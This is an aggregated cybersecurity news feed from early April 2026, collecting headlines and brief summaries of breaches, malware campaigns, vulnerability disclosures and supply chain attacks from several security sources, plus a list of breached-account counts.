Talkback.sh News

Fri, 03 Apr 2026 18:51:58 +0000

• ShinyHunters issues final warning to Cisco over alleged data theft [net] [social]
  ShinyHunters warns Cisco of a data leak threat by April 3, 2026, claiming access to over three million records through multiple breach methods, including social engineering and compromised accounts.
• Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers [net] [mal]
  Threat actors deploy cookie-controlled PHP web shells with obfuscation and persistence techniques on Linux servers, requiring strict access controls and monitoring to detect and prevent.
• ICE confirms use of Paragon spyware in drug trafficking cases [mal]
  ICE confirmed using Paragon Solutions' spyware in drug and terrorism investigations, despite past controversies and initial suspension over compliance issues.
• Pro-Iran Handala group breached Israeli defence contractor PSK Wind Technologies [ics]
  Iran-linked hacker group Handala claimed to breach Israeli defense contractor PSK Wind, amid ongoing Iran-Israel cyber tensions, with a history of high-profile attacks and a $10 million FBI reward.
• Drift Loses $285 Million in Durable Nonce Social Engineering Attack Linked to DPRK [social]
  North Korean threat actors orchestrated a $285 million social engineering attack on Solana-based Drift, exploiting multisig security through pre-signed transactions and laundering via Tornado Cash, marking their eighteenth crypto theft since 2026.
• New SparkCat Variant in iOS, Android Apps Steals Crypto Wallet Recovery Phrase Images [app] [mal]
  A new, evolving version of SparkCat malware targets iOS and Android apps to steal cryptocurrency recovery phrases via OCR, employing advanced obfuscation and language-specific tactics, with Chinese-speaking operators behind the threat.
• Adobe Data Breach 2026: Mr. Raccoon Leaks 13M Support Tickets [social]
  A threat actor exploited a third-party BPO to exfiltrate 13 million support tickets and sensitive data from Adobe through social engineering and misuse of legitimate tools, highlighting supply chain security risks.
• FBI notified Congress last week of China-linked hack deemed 'major incident' [net]
  The FBI disclosed a major Chinese-linked cyber hack targeting sensitive law enforcement data in the Virgin Islands, raising national security concerns amid ongoing U.S.-China tensions.
• ShinyHunters Hackers Claim Theft of 3M+ Cisco Records, Threaten Public Leak [cloud] [social]
  ShinyHunters claims to have stolen over 3 million Cisco records via Salesforce and AWS, threatening a public leak if demands are unmet by April 2026, amid unverified claims and previous attacks targeting various industries.
• Drift Protocol estimated to have lost $285M in crypto heist
  Drift Protocol, a Solana-based DeFi exchange, suffered a $285 million theft likely due to leaked admin keys, leading to suspension of all transactions.

Talkback.sh Technical

Fri, 03 Apr 2026 23:37:12 +0000

• DLX7 ShieldNet | Trust Posture Dashboard [app] [net]
  A comprehensive security dashboard offering threat detection, framework alignment, real-time insights, and automated response recommendations to enhance organizational cybersecurity posture.
• CVE-2026-33579: OpenClaw Privilege Escalation Fix Guide [app] [exp]
  CVE-2026-33579 is a high-severity privilege escalation in OpenClaw prior to 2026.3.28 that allows attackers with pairing access to gain full admin control by bypassing scope checks, especially in unauthenticated or exposed instances, requiring an upgrade to version 2026.3.28 or later.
• c89cc.sh [standalone C89/ELF64 compiler in pure portable shell [sys]]
  A portable shell-script-based C89 parser and compiler targeting x86-64 ELF64, with built-in libc, system call implementations, and custom memory management for self-contained C program compilation and execution.
• Claude Code Found a Linux Vulnerability Hidden for 23 Years [exp] [sys]
  Nicholas Carlini used AI to uncover a 23-year-old Linux kernel buffer overflow vulnerability in the NFS driver, exemplifying AI's growing role in security research and the potential rise of AI-driven cyber threats.
• Part 2: AWS CodeBuild (Escalating Privileges via AWS CodeConnections) [app] [cloud]
  An unprivileged AWS CodeBuild job can exfiltrate full GitHub/BitBucket tokens via undocumented APIs, enabling privilege escalation and repository manipulation, mitigated by blocking `GetConnectionToken` permissions.
• Public disclosure [social]
  A user publicly discloses a security project on GitHub, emphasizing transparency and encouraging independent analysis, while thanking MSRC leadership.
• Remote code execution in CentOS Web Panel [CVE-2025-70951 [app] [exp]]
  A new RCE vulnerability (CVE-2025-70951) in Control Web Panel on CentOS allows authenticated attackers to inject commands via the addons module's dompath parameter due to insufficient input sanitization, affecting versions 0.9.8.1218 to 0.9.8.1222 and patched in 0.9.8.1224.
• GitHub [sooryathejas/METATRON: AI-powered penetration testing assistant using local LLM on linux (Parrot OS) [net] [sys]]
  Metatron is an offline, CLI-based Linux penetration testing tool that integrates local AI analysis, reconnaissance, and vulnerability management using tools like nmap, nikto, and a fine-tuned LLM, with comprehensive session tracking via MariaDB.
• Blog [net]
  HookProbe's blog explores advanced, autonomous edge security solutions leveraging AI, kernel-level protection, and real-time threat detection with technologies like NAPSE, HYDRA, and AEGIS, including deployments on Raspberry Pi for IoT and SMBs.
• BitLocker’s Little Secrets: The Undocumented FVE API [rev] [sys]
  Undocumented Windows FVE API exposes volume encryption details to low-privilege users, enabling potential information disclosure and privilege escalation.

Hacker News

Sat, 04 Apr 2026 06:58:07 +0530

• China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing
  A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region. The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda. 'This TA416 activity included multiple
• Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
  Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. 'Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,
• UNC1069 Social Engineering of Axios Maintainer Led to npm Supply Chain Attack
  The maintainer of the Axios npm package has confirmed that the supply chain compromise was the result of a highly-targeted social engineering campaign orchestrated by North Korean threat actors tracked as UNC1069. Maintainer Jason Saayman said the attackers tailored their social engineering efforts 'specifically to me' by first approaching him under the guise of the founder of a
• Why Third-Party Risk Is the Biggest Gap in Your Clients' Security Posture
  The next major breach hitting your clients probably won't come from inside their walls. It'll come through a vendor they trust, a SaaS tool their finance team signed up for, or a subcontractor nobody in IT knows about. That's the new attack surface, and most organizations are underprepared for it. Cynomi's new guide, Securing the Modern Perimeter: The Rise of Third-Party
• New SparkCat Variant in iOS, Android Apps Steals Crypto Wallet Recovery Phrase Images
  Cybersecurity researchers have discovered a new version of the SparkCat malware on the Apple App Store and Google Play Store, more than a year after the trojan was discovered targeting both the mobile operating systems. The malware has been found to conceal itself within seemingly benign apps, such as enterprise messengers and food delivery services, while
• Drift Loses $285 Million in Durable Nonce Social Engineering Attack Linked to DPRK
  Solana-based decentralized exchange Drift has confirmed that attackers drained about $285 million from the platform during a security incident that took place on April 1, 2026. 'Earlier today, a malicious actor gained unauthorized access to Drift Protocol through a novel attack involving durable nonces, resulting in a rapid takeover of Drift’s Security Council administrative powers,' the&
• Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials
  A large-scale credential harvesting operation has been observed exploiting the React2Shell vulnerability as an initial infection vector to steal database credentials, SSH private keys, Amazon Web Services (AWS) secrets, shell command history, Stripe API keys, and GitHub tokens at scale. Cisco Talos has attributed the operation to a threat cluster it tracks as
• Cisco Patches 9.8 CVSS IMC and SSM Flaws Allowing Remote System Compromise
  Cisco has released updates to address a critical security flaw in the Integrated Management Controller (IMC) that, if successfully exploited, could allow an unauthenticated, remote attacker to bypass authentication and gain access to the system with elevated privileges. The vulnerability, tracked as CVE-2026-20093, carries a CVSS score of 9.8 out of a maximum of 10.0. 'This
• ThreatsDay Bulletin: Pre-Auth Chains, Android Rootkits, CloudTrail Evasion & 10 More Stories
  The latest ThreatsDay Bulletin is basically a cheat sheet for everything breaking on the internet right now. No corporate fluff or boring lectures here, just a quick and honest look at the messy reality of keeping systems safe this week. Things are moving fast. The list includes researchers chaining small bugs together to create massive backdoors, old software flaws
• Researchers Uncover Mining Operation Using ISO Lures to Spread RATs and Crypto Miners
  A financially motivated operation codenamed REF1695 has been observed leveraging fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023. 'Beyond cryptomining, the threat actor monetizes infections through CPA (Cost Per Action) fraud, directing victims to content locker pages under the guise of software registration,' Elastic

SANS Internet Storm Center

Sat, 04 Apr 2026 03:15:04 +0000

• TeamPCP Supply Chain Campaign: Update 006 [CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments, (Fri, Apr 3rd)]
  This is the sixth update to the TeamPCP supply chain campaign threat intelligence report,&#;x26;#;xc2;&#;x26;#;xa0;'When the Security Scanner Became the Weapon'&#;x26;#;xc2;&#;x26;#;xa0;(v3.0, March 25, 2026).&#;x26;#;xc2;&#;x26;#;xa0;Update 005&#;x26;#;xc2;&#;x26;#;xa0;covered developments through April 1, including the first confirmed victim disclosure (Mercor AI), Wiz&#;x26;#;39;s post-compromise cloud enumeration findings, DPRK attribution of the axios compromise, and LiteLLM&#;x26;#;39;s release resumption after Mandiant&#;x26;#;39;s forensic audit. This update covers intelligence from April 1 through April 3, 2026.
• ISC Stormcast For Friday, April 3rd, 2026 https://isc.sans.edu/podcastdetail/9878, (Fri, Apr 3rd)
  
• Attempts to Exploit Exposed 'Vite' Installs (CVE-2025-30208), (Thu, Apr 2nd)
  From its GitHub repo: 'Vite (French word for 'quick', pronounced /vi?t/, like 'veet') is a new breed of frontend build tooling that significantly improves the frontend development experience' [https://github.com/vitejs/vite].
• ISC Stormcast For Thursday, April 2nd, 2026 https://isc.sans.edu/podcastdetail/9876, (Thu, Apr 2nd)
  
• Malicious Script That Gets Rid of ADS, (Wed, Apr 1st)
  Today, most malware are called “fileless” because they try to reduce their footprint on the infected computer filesystem to the bare minimum. But they need to write something… think about persistence. They can use the registry as an alternative storage location.
• TeamPCP Supply Chain Campaign: Update 005 [First Confirmed Victim Disclosure, Post-Compromise Cloud Enumeration Documented, and Axios Attribution Narrows, (Wed, Apr 1st)]
  This is the fifth update to the TeamPCP supply chain campaign threat intelligence report, 'When the Security Scanner Became the Weapon' (v3.0, March 25, 2026). Update 004 covered developments through March 30, including the Databricks investigation, dual ransomware operations, and AstraZeneca data release. This update consolidates two days of intelligence through April 1, 2026.
• ISC Stormcast For Wednesday, April 1st, 2026 https://isc.sans.edu/podcastdetail/9874, (Wed, Apr 1st)
  
• Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)
  In case of a cyber incident, most organizations fear more of data loss (via exfiltration) than regular data encryption because they have a good backup policy in place. If exfiltration happened, it means a total loss of control of the stolen data with all the consequences (PII, CC numbers, …).
• ISC Stormcast For Tuesday, March 31st, 2026 https://isc.sans.edu/podcastdetail/9872, (Tue, Mar 31st)
  
• TeamPCP Supply Chain Campaign: Update 004 [Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)]
  This is the fourth update to the TeamPCP supply chain campaign threat intelligence report,&#;x26;#;xc2;&#;x26;#;xa0;'When the Security Scanner Became the Weapon'&#;x26;#;xc2;&#;x26;#;xa0;(v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign&#;x26;#;39;s shift to monetization. This update consolidates intelligence from March 28-30, 2026 -- two days since our last update.

Troy Hunt Breaches

• SongTrivia2 [291,739 breached accounts]
  Sat, 04 Apr 2026 01:59:01 Z
• SUCCESS [253,510 breached accounts]
  Wed, 01 Apr 2026 06:51:14 Z
• Cuties AI [144,250 breached accounts]
  Tue, 31 Mar 2026 06:52:52 Z
• BreachForums Version 5 [339,778 breached accounts]
  Fri, 27 Mar 2026 02:19:23 Z
• Scuf Gaming [128,683 breached accounts]
  Thu, 26 Mar 2026 05:31:26 Z
• Sound Radix [292,993 breached accounts]
  Thu, 26 Mar 2026 00:06:29 Z
• RuneScape Boards [222,762 breached accounts]
  Mon, 23 Mar 2026 21:40:06 Z
• Aura [903,080 breached accounts]
  Wed, 18 Mar 2026 05:29:58 Z
• Divine Skins [105,814 breached accounts]
  Sun, 15 Mar 2026 05:18:40 Z
• Baydöner [1,266,822 breached accounts]
  Sun, 15 Mar 2026 03:36:43 Z
• Provecho [712,904 breached accounts]
  Tue, 03 Mar 2026 06:40:50 Z
• Lovora [495,556 breached accounts]
  Mon, 02 Mar 2026 07:23:06 Z
• Quitbro [22,874 breached accounts]
  Mon, 02 Mar 2026 05:27:11 Z
• KomikoAI [1,060,191 breached accounts]
  Mon, 02 Mar 2026 01:31:29 Z
• Odido [6,077,025 breached accounts]
  Thu, 26 Feb 2026 23:25:29 Z
• Canadian Tire [38,306,562 breached accounts]
  Wed, 25 Feb 2026 06:53:25 Z
• CarGurus [12,461,887 breached accounts]
  Sun, 22 Feb 2026 04:43:54 Z
• CarMax [431,371 breached accounts]
  Fri, 20 Feb 2026 03:48:30 Z
• Figure [967,178 breached accounts]
  Wed, 18 Feb 2026 01:11:11 Z
• Canada Goose [581,877 breached accounts]
  Tue, 17 Feb 2026 00:19:51 Z